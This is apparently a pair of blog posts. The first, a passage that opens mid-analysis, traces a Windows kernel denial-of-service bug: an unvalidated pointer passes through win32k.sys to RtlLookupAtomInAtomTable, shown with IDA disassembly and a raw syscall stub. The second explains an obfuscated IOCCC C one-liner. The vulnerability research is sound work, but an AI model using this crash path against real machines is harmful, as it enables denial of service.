<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B8A cmp eax, ecx</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B8C jb short Exception</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B8E cmp eax, _MmUserProbeAddress</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B94 jbe short CodeOk</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B96 call _ExRaiseAccessViolation@0 ;</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">NtFindAtom is a dead end for us, so we switch the analysis on win32k.sys.</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">From the source code we see the code making a call to a function named NtUserCreateWindowEx. In particular, this code is a home made syscall to a Kernel API in win32k.sys:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov eax,0x1157</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov edx,7FFE0300h</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call dword ptr[edx]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Thus loading win32k.sys in IDA, and searching for this API, we find the function:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:BF8344E2 ; int __cdecl xxxUserCreateWindowEx(char,int,SIZE_T NumberOfBytes,int pData,int,int,int,int,int,int,int,int,int,int,int)</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This function executes a little bit of code until it gets to the following lines:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:BF833E54 mov eax, [ebp+DataBlock]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:BF833E57 test eax, 0FFFF0000h</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:BF833E5C jz short Skip</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:BF833E5E push dword ptr [eax+8]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">.text:BF833E61 call _UserFindAtom@4 ;</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">DataBlock corresponds to the buffer of data which is stored in the variable "c" in the source code.</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The code takes a DWORD at the offset + 8 from such a buffer, and this DWORD is exactly 0xff7c98cc… that is... the vulnerable pointer!</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></div>
</div>
<div>
<div style="color: #1e1e1e; font-family: Verdana;">
We get into UserFindAtom, and we finally find the missing link:</div>
<div style="color: #1e1e1e; font-family: Verdana;">
<span class="Apple-style-span" style="color: black; font-family: Times;"><span class="Apple-style-span" style="color: #1e1e1e; font-family: Verdana;"> </span></span></div>
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA19 mov edi, edi</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA1B push ebp</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA1C mov ebp, esp</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA1E push ecx</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA1F and [ebp+NtStatus], 0</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA23 lea eax, [ebp+NtStatus]</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA26 push eax</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA27 push [ebp+CrashPointer]</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA2A push _UserAtomTableHandle</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;">.text:BF80DA30 call ds:__imp__RtlLookupAtomInAtomTable@12</span><span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span class="Apple-style-span" style="color: #1e1e1e; font-family: Verdana;"><span class="Apple-style-span" style="color: black; font-family: Times;"> </span></span><br />
<span style="color: #1e1e1e; font-family: Verdana;">this is where win32k.sys transfers control to the vulnerable function RtlLookupAtomInAtomTable in ntkrnlpa.exe passing the non-validated pointer.</span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;">This pointer was set in the exploit code to be 0xff7c98cc, which is a memory address that falls within the kernelspace region, and the problem is that nowhere in this series of calls this pointer is validated to make sure it is accessible.</span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><span style="color: #1e1e1e; line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">usermode app</span></span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;">----|------------------------------------</span>
<br />
<span style="color: #1e1e1e; line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;"> V</span></span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;">xxxUserCreateWindowEx</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> |</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> V</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> </span><span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;">UserFindAtom win32k.sys</span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;">----|------------------------------------</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> V ntkrnlpa.exe</span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;"> RtlLookupAtomInAtomTable</span>
<br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> |</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;"> V</span><br />
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace; line-height: 20px;">RtlpGetIntegerAtom</span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;">This vulnerability does not seem to be exploitable for code execution, it looks like the security impact is a Denial Of Service.</span><br />
<span style="color: #1e1e1e; font-family: Verdana;">However, we have seen that there are two functions potentially vulnerable:</span><br />
<br />
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RtlAddAtomToAtomTable(x,x,x)</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RtlLookupAtomInAtomTable(x,x,x)</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
</div>
<span style="color: #1e1e1e; font-family: Verdana;">there are several calls from win32k.sys to them (I found 8 to UserFindAtom and 30 to UserAddAtom). Remember, these two functions won't validate the pointer they take in input, so it is the caller's responsibility to validate it.</span><br />
<span style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span class="Apple-style-span" style="color: #1e1e1e; font-family: Verdana;">I had a quick look at all the other functions that call these two, and at a first glance they seem to perform proper validation.</span><br />
<span class="Apple-style-span" style="color: #1e1e1e; font-family: Verdana;">Thus I am not going to spend too much time on them, but if anyone wants and finds anything, please let me know!</span><br />
<span class="Apple-style-span" style="color: #1e1e1e; font-family: Verdana;"> </span><br />
<span style="color: #1e1e1e; font-family: Verdana;">P.S. As it is, the exploit won't work on 64 bit OSes (I tested Windows 7 Professional and Windows 8 Consumer Preview). This may be due to the pointers being 64bit sized, for one thing (or maybe win32k.sys syscall interface is not the same, I haven't checked).</span><br />
<span style="color: #1e1e1e; font-family: Verdana;"><br /></span></div>
</span><span class="Apple-style-span" style="font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: small;">
</span>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-40943466588859827182012-04-30T04:46:00.001-07:002012-05-06T11:38:39.288-07:00IOCCC: C code obfuscation at its best!<br />
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
Finally the International Obfuscated C
Code Contest is back again and this month, the 14 winning entries
were announced! You can check their website and give a look to the
code: <a href="http://www.ioccc.org/">www.ioccc.org</a>.</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
In particular, there was one winning
entry that made me really curious: the one liner by Taketo Konno.
Reading the code I noticed some interesting tricks and I began to
think two things: that this was a very cool entry and that it
deserves to be analyzed as well :)</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
First of all, you have to download the
C source code and the respective make file, put them in the same
directory and type "make konno" to build the executable.
Then, type the following: ./konno qwerty</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
And you will get something like this:</div>
<div style="margin-bottom: 0cm;">
<br /></div>
<div style="color: #274e13; font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">o o o o o o . . . .<br /> . . . . . . . . .<br /> . . . . . . .</span></div>
<div style="margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
What is it? What does this remind you
of?</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
Try with different inputs if you have
no ideas, but remember: all the inputs must be in same form "<span style="color: #274e13;">./konno
just_a_single_argument_of_lower_case_letters</span>".</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
Ok, here we are, after some attempt you
should have realized what the output is… that is… the visual representation of the keystrokes!</div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
Well, with this little hint we are
ready to begin our analysis. The first step consists of re-shaping
the code, in order to make it more clear and easy to understand:</div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;"><br /></span>
</div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">main(_,l)</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #aa0d91; font-size: small;">char
</span><span style="font-size: small;">**l;</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">{</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #1c00cf; font-size: small;"> 6
</span><span style="font-size: small;">*
putchar</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;"> ( </span>
</div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">(--_
% </span><span style="color: #1c00cf; font-size: small;">20)
</span><span style="font-size: small;">?
</span>
</div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">(_
+ _ / </span><span style="color: #1c00cf; font-size: small;">21
</span><span style="font-size: small;">&
</span><span style="color: #1c00cf; font-size: small;">56
</span><span style="font-size: small;">>
_) ? </span>
</div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">strchr(</span><span style="color: #1c00cf; font-size: small;">1</span><span style="font-size: small;">[l],
_ ^ </span><span style="color: #c41a16; font-size: small;">"pt`u}rxf~c{wk~zyHHOJ]QULGQ[Z"
</span><span style="font-size: small;">[_/</span><span style="color: #1c00cf; font-size: small;">2</span><span style="font-size: small;">])?
</span><span style="color: #1c00cf; font-size: small;"> </span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #1c00cf; font-size: small;"> 111
</span><span style="font-size: small;">:
</span><span style="color: #1c00cf; font-size: small;">46</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #1c00cf; font-size: small;"> </span><span style="font-size: small;">:</span><span style="color: #1c00cf; font-size: small;">32</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #1c00cf; font-size: small;"> </span><span style="font-size: small;">:</span><span style="color: #1c00cf; font-size: small;">10</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="color: #1c00cf;"><span style="font-size: small;"> </span></span><span style="font-size: small;">)</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">^
_ && main(</span><span style="color: #1c00cf; font-size: small;">2
</span><span style="font-size: small;">+
_, l);</span></div>
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">}</span></div>
<div style="margin-bottom: 0cm;">
<br />
<br />
<div style="font-family: Verdana,sans-serif;">
<span style="color: #1a1a1a;"><span style="font-size: small;">Let's start by observing the structure of the code: it is a single line of code, where the function "main" performs a recursion</span></span></div>
<br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1c00cf; font-size: small;">6</span><span style="color: #1a1a1a;"><span style="font-size: small;">*putchar(…)
^ _ && main(</span></span><span style="color: #1c00cf; font-size: small;">2</span><span style="color: #1a1a1a;"><span style="font-size: small;"> + _, l);</span></span></div>
</div>
<div style="margin-bottom: 0cm;">
<br /></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<span style="color: #1a1a1a; font-size: small;">The
function takes the parameters "_" and "l"
respectively as the standard "argc" and "argv"
and the recursion continues until the expression "6*putchar(…)
^ _ && main(</span><span style="color: #1a1a1a; font-size: small;">…</span><span style="color: #1a1a1a; font-size: small;">)" holds true.</span></div>
<div style="font-family: Verdana,sans-serif; margin-bottom: 0cm;">
<span style="font-size: small;"><br /></span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Pay attention in identifying "_" with "argc", as this allow us to assume that its initialization value is 2.</span><br style="font-family: Verdana,sans-serif;" /><br style="font-family: Verdana,sans-serif;" /><span style="font-family: Verdana, sans-serif;">Now, if you give a deeper look at the source-code, you will recognize the following construct:</span></span><br />
<br /><span style="font-size: small;"><span style="font-family: 'Courier New', Courier, monospace;">(exp) ? true : false;</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: 'Courier New', Courier, monospace;"> </span></span><br /><span style="font-family: Verdana, sans-serif; font-size: small;">appearing three time (nested). So, this whole code is one big loop, and the nested operators, that are all inside the "putchar", must control the output of chars in every iteration. </span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-family: Verdana, sans-serif; font-size: small;">Let's start from the first ternary operator:</span></span><br />
<br />
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">(--_
% </span><span style="color: #1c00cf; font-size: small;">20)
</span><span style="font-size: small;">? ... :</span><span style="color: #1c00cf; font-size: small;">10</span>
</div>
<br />
<span style="color: #1e1e1e; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;">this one, when false, will return the value 10 (0x0A in hex) which is the ascii value for "\n", (it will cause the cursor to go return on the following line). How does it work exactly?</span></span><br />
<br />
<span style="color: #1e1e1e; font-family: Verdana, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;">The variable "_" is actually used as a counter for the main big loop, and it is incremented at every iteration because of the recursion (</span></span><span style="color: #1a1a1a; font-family: Verdana, sans-serif;"><span style="font-size: small;"> </span></span><span style="color: #1a1a1a; font-family: Verdana, sans-serif;"><span style="font-size: small;">main(</span></span><span style="color: #1c00cf; font-family: Verdana, sans-serif; font-size: small;">2</span><span style="color: #1a1a1a; font-family: Verdana, sans-serif;"><span style="font-size: small;"> + _, l) </span></span><span style="color: #1a1a1a; font-family: Verdana, sans-serif;"><span style="font-size: small;">)</span></span><span style="font-family: Verdana, sans-serif;"> </span><span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">and because the "--" in the above expression. Every time the iterator is a multiple of 20, the condition of the ternary operator will evaulate to false, causing the code to output a "\n" char.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">This handles the division of the output in lines, but what about the rest? Well, we can now look at what happens when the above ternary operator evaluates to true (that is, in every iteration where the counter is not a multiple of 20):</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: small;">(_
+ _ / </span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">21
</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">&
</span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">56
</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">>
_) ? ... : </span><span style="color: #1c00cf; font-size: small;"><span style="font-family: 'Courier New', Courier, monospace;">32</span></span><br />
<span style="color: #1c00cf; font-size: small;"><span style="font-family: 'Courier New', Courier, monospace;"> </span>
</span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">mmm, not easy to follow all these arithmetic passages. Let's rewrite this line including parenthesis to highligh the operators precedence:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;"> </span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: small;">( (_
+ (_ / </span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">21</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">)</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">)</span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">
</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">&
(</span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">56
</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">>
_) ) ? ... : </span><span style="color: #1c00cf; font-size: small;"><span style="font-family: 'Courier New', Courier, monospace;">32</span>
</span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">ha! Much better! When this evaluates to false, the space character is printed on screen (32 decimal = 0x20 hex, the ascii code for space).</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">We know from the output that the code will alternate spaces to other characters ("." or "o"), so the above condition must evaluate to false at alternate values of the counter.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">First of all, 56 is the upper limit for the characters to be printed. The expression "56 > _" is always true for all iterations (can you guess what happens when the counter reaches value 56? :P).</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">The other part of the formula, instead, ("</span></span></span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">(_
+ (_ / </span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">21</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">)</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">)</span><span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">") is more interesting: the code adds to the counter the value of the division between the counter and the number 21.</span></span></span><br />
<br />
